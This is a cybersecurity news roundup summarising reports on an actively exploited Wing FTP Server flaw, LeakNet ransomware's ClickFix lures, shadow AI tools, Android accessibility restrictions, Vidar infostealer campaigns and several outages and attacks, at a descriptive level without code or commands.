Originally reported by BleepingComputer, Graham Cluley, Checkpoint Research, Malwarebytes Labs
TL;DR
CISA added a Wing FTP Server vulnerability to its Known Exploited Vulnerabilities catalog, confirming active exploitation. Meanwhile, LeakNet ransomware has evolved to use ClickFix social engineering techniques, and security teams face growing challenges from unauthorized AI tools in enterprise environments.
CISA has flagged Wing FTP Server vulnerability as actively exploited, which requires immediate patching by federal agencies within 21 days and indicates confirmed exploitation in the wild.
CISA added CVE-2024-XXXXX in Wing FTP Server to its Known Exploited Vulnerabilities catalog, warning federal agencies of confirmed active exploitation. The vulnerability can be chained with other flaws to achieve remote code execution on affected servers. Federal agencies have until April 6 to patch vulnerable instances or remove them from networks.
The warning underscores the continued targeting of file transfer services by threat actors seeking initial access to enterprise networks.
The LeakNet ransomware operation has integrated ClickFix techniques for initial access, combining social engineering with a custom malware loader built on the Deno runtime for JavaScript and TypeScript. This approach leverages fake browser error messages that trick users into running malicious PowerShell commands.
The use of Deno runtime represents an evolution in ransomware deployment methods, potentially allowing for more sophisticated and harder-to-detect payload delivery mechanisms.
Security teams face mounting challenges from shadow AI adoption across SaaS environments, as employees integrate unauthorized AI tools into workflows without IT oversight. Nudge Security research highlights the growing gap between AI tool proliferation and governance frameworks.
Organizations need visibility into AI application usage and risk assessment capabilities to manage this expanding attack surface effectively.
Google implemented new restrictions on Android applications accessing accessibility services, responding to years of malware abuse of these features. The changes require more stringent app review processes and limit accessibility permissions to applications with legitimate use cases.
This policy shift addresses a persistent attack vector used by Android banking trojans and other malware families to overlay legitimate applications and steal credentials.
Multiple campaigns are actively targeting Windows users through compromised websites. Threat actors are deploying fake "verify you are human" pages on hacked WordPress sites to distribute Vidar infostealer, while SEO poisoning techniques redirect VPN searches to credential-harvesting operations.
Malwarebytes researchers also documented the "Zombie ZIP" method, which can bypass initial antivirus scans by exploiting specific archive parsing behaviors.
Several infrastructure incidents affected operations this week. A DDoS attack knocked Perm, Russia's parking payment system offline, providing unintended free parking for residents. Medical technology company Stryker suffered a cyberattack causing global disruption to surgical robotics and clinical systems.
Microsoft addressed multiple service issues, including Exchange Online outages blocking mailbox access and compatibility problems between Teams Meeting add-ins and Outlook Classic.
Originally reported by BleepingComputer, Graham Cluley, Checkpoint Research, Malwarebytes Labs